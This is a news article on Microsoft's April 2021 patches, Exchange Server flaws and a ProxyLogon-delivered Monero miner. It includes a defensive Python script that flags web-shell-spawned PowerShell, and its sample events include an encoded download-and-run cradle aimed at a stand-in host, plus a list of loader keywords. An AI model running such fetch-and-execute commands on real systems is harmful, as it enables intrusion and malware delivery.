Fixes for critical vulnerabilities are included in the latest Microsoft updates. Photo: Shutterstock
Microsoft has released fixes for more than 100 security vulnerabilities in its latest monthly update, 19 of which are rated critical, and at least one of which is a zero-day that is being actively exploited.
Kaspersky researchers had already detected attackers using one of the zero-day vulnerabilities, an out-of-bounds write in a Desktop Window Manager DLL, to escalate privileges in the wild.
The Russian security company said in a blog post that the exploit was "likely used in conjunction with other browser exploits to escape sandboxes or gain access to the system for further use."
Elevated privileges can allow attackers to execute code, install malware, or create additional accounts so that they can persist on the system unnoticed.
Four new vulnerabilities in Microsoft Exchange Server are also addressed in this month's update, two of which can be exploited without authenticating to the server.
Microsoft said it "was not aware of active exploitations in the wild," but recommended that affected systems be patched immediately because the vulnerabilities are highly likely to be exploited.
The Australian Cyber Security Centre (ACSC) released a new advisory on Thursday morning warning administrators to keep Exchange servers up to date, following Microsoft's announcement last month that the Chinese hacking group Hafnium had been exploiting a number of zero-day vulnerabilities.
"Attackers can exploit these vulnerabilities to gain and maintain access to Microsoft Exchange installations," the ACSC said.
"The patches previously released by Microsoft in March 2021 do not fix these new vulnerabilities, and organisations must apply the Microsoft April 13, 2021 updates to prevent possible compromise."
More Exchange Server attacks
Exchange Server vulnerabilities have been such a problem that the U.S. Federal Bureau of Investigation (FBI) recently removed web shells from affected private-sector systems under a court order, without notifying the owners in advance.
While publicising a widespread vulnerability is necessary to raise awareness, it has also led to the flaws being exploited by a range of threat actors to deliver payloads such as ransomware.
This week, security company Sophos found attackers using ProxyLogon to install a cryptocurrency miner on unsuspecting servers.
The attackers use a PowerShell command to silently inject the miner into a Windows system process, with a forged certificate to make it look legitimate, and then remove the evidence while it mines Monero, a privacy coin favoured by dark-web marketplaces.
Sophos researcher Andrew Brandt said the attack was unusual in the way it used already compromised Exchange servers to distribute the miner.
"The attackers deployed several common anti-detection techniques, installed the malicious miner in memory to keep it hidden from security checks, deleted installation and configuration files after use, and used Transport Layer Security traffic encryption to communicate with their Monero wallet," he said.
"As a result, for most victims, the first sign of compromise is likely to be a significant drop in processing power. Unpatched servers may be compromised for some time before this becomes apparent."
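The chain Sophos describes, a web shell on an Exchange server launching a hidden, encoded PowerShell command that loads the miner in memory, still leaves a process-creation trail even after the files on disk are deleted. The script below is an added example and is not Sophos's or Microsoft's detection logic: it scans constructed Sysmon-style process-creation records (assumed tab-separated fields: time, image, parent image, command line) and flags shells spawned by the IIS worker process, hidden-window flags, and -EncodedCommand payloads, which it decodes. The w3wp.exe parent, the sample command lines and the example.invalid URL are assumptions made for illustration.

```python
import base64
from dataclasses import dataclass
from typing import List, Optional

# Assumptions for this example: ProxyLogon web shells run inside the IIS worker
# process, so a shell spawned by w3wp.exe is the anchor of the detection.
IIS_WORKER = "w3wp.exe"
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Substrings typical of in-memory loaders (matched case-insensitively).
LOADER_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "frombase64string", "reflection.assembly", "virtualalloc")

# Constructed sample payload (not real telemetry): a download cradle encoded the
# way powershell.exe -EncodedCommand expects it, base64 over UTF-16LE.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/m')"
    .encode("utf-16-le")).decode("ascii")

# Constructed sample events (not real telemetry). Fields: time, image, parent, command line.
SAMPLE_EVENTS = "\n".join("\t".join(row) for row in [
    ("2021-04-14 03:12:07", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\inetsrv\w3wp.exe", "powershell.exe -NoP -W Hidden -Enc " + _ENCODED),
    ("2021-04-14 03:15:22", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\explorer.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ("2021-04-14 03:16:40", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\inetsrv\w3wp.exe", "cmd.exe /c whoami"),
])


@dataclass
class Event:
    time: str
    image: str
    parent: str
    cmdline: str


@dataclass
class Finding:
    time: str
    reasons: List[str]
    decoded: Optional[str]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _flag_matches(token: str, parameter: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name ('-w', '-enc', ...)."""
    if not token.startswith("-") or len(token) < 2:
        return False
    return parameter.startswith(token[1:].lower())


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        # "-ExecutionPolicy" also starts with "-e" but is not a prefix of "encodedcommand".
        if _flag_matches(tok, "encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def has_hidden_window(cmdline: str) -> bool:
    tokens = cmdline.split()
    return any(_flag_matches(tok, "windowstyle") and nxt.lower() == "hidden"
               for tok, nxt in zip(tokens, tokens[1:]))


def parse_events(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(Event(*line.split("\t", 3)))
    return events


def analyse(event: Event) -> Optional[Finding]:
    reasons = []
    if _basename(event.parent) == IIS_WORKER and _basename(event.image) in SHELL_HOSTS:
        reasons.append("shell spawned by IIS worker process (web shell pattern)")
    if has_hidden_window(event.cmdline):
        reasons.append("hidden window")
    decoded = decode_encoded_command(event.cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        hits = [m for m in LOADER_MARKERS if m in decoded.lower()]
        if hits:
            reasons.append("loader markers: " + ", ".join(hits))
    return Finding(event.time, reasons, decoded) if reasons else None


def run_detection(text: str) -> List[Finding]:
    return [f for f in map(analyse, parse_events(text)) if f is not None]


if __name__ == "__main__":
    for finding in run_detection(SAMPLE_EVENTS):
        print(finding.time, "|", "; ".join(finding.reasons))
        if finding.decoded:
            print("  decoded:", finding.decoded)
```

The parent-process rule is the one that survives the attackers' clean-up: deleting the dropped files and keeping the miner in memory does not rewrite the process-creation record, so retaining those events centrally (rather than only on the compromised host) is what makes the check useful after the fact.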
Sophos tracked the miner's activity through the Monero blockchain and saw spikes as it gained and lost infected servers.